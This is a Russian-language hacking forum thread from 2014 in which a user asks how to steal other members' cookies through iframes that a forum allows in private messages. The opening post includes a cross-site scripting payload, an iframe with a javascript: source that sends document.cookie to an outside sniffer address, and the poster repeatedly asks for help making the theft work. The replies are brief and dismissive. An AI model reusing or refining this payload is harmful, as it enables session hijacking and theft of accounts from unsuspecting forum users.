XSS в iframe

Discussion in 'Песочница' started by Seller Zeus, 21 Jan 2014.

  1. Seller Zeus

    Seller Zeus New Member

    Joined:
    29 May 2012
    Messages:
    34
    Likes Received:
    0
    Reputations:
    0
    Есть форум где в ЛС можно отправить фрейм в любым содержимым src.
    Есть какие нибудь способы взлома или еще что нибудь хорошее?

    В гугле был, ничего полезного не нашел.

    Если использую такой код:

    Code:
    <iframe type="text/html" width="607" height="360" src="javascript:img = new Image(); img.src = 'http://mysite.ru/snf/s.gif?'+document.cookie;" frameborder="0"></iframe>
    То ссылка на "картинку" и куки показываются прямо во фрейме, а мне хотелось бы чтобы они на сниффер улетели.
     
    #1 Seller Zeus, 21 Jan 2014
  2. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    939
    Likes Received:
    524
    Reputations:
    173
    ну так картинка это и есть снифер
     
    #2 OxoTnik, 21 Jan 2014
  3. Seller Zeus

    Seller Zeus New Member

    Joined:
    29 May 2012
    Messages:
    34
    Likes Received:
    0
    Reputations:
    0
    Ну да, а как получить куки и запихнуть в нее?
     
    #3 Seller Zeus, 21 Jan 2014
  4. Seller Zeus

    Seller Zeus New Member

    Joined:
    29 May 2012
    Messages:
    34
    Likes Received:
    0
    Reputations:
    0
    люди, ау
     
    #4 Seller Zeus, 22 Jan 2014
  5. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    939
    Likes Received:
    524
    Reputations:
    173
    куда ты хочешь запихнуть кукисы? в снифер? так их одтудова брать надо и не наоборот
     
    #5 OxoTnik, 22 Jan 2014
  6. Seller Zeus

    Seller Zeus New Member

    Joined:
    29 May 2012
    Messages:
    34
    Likes Received:
    0
    Reputations:
    0
    О люди, перестаньте издеваться, как мне составить iframe чтобы спереть куки и отправить на сниффер?
     
    #6 Seller Zeus, 22 Jan 2014
(You must log in or sign up to post here.)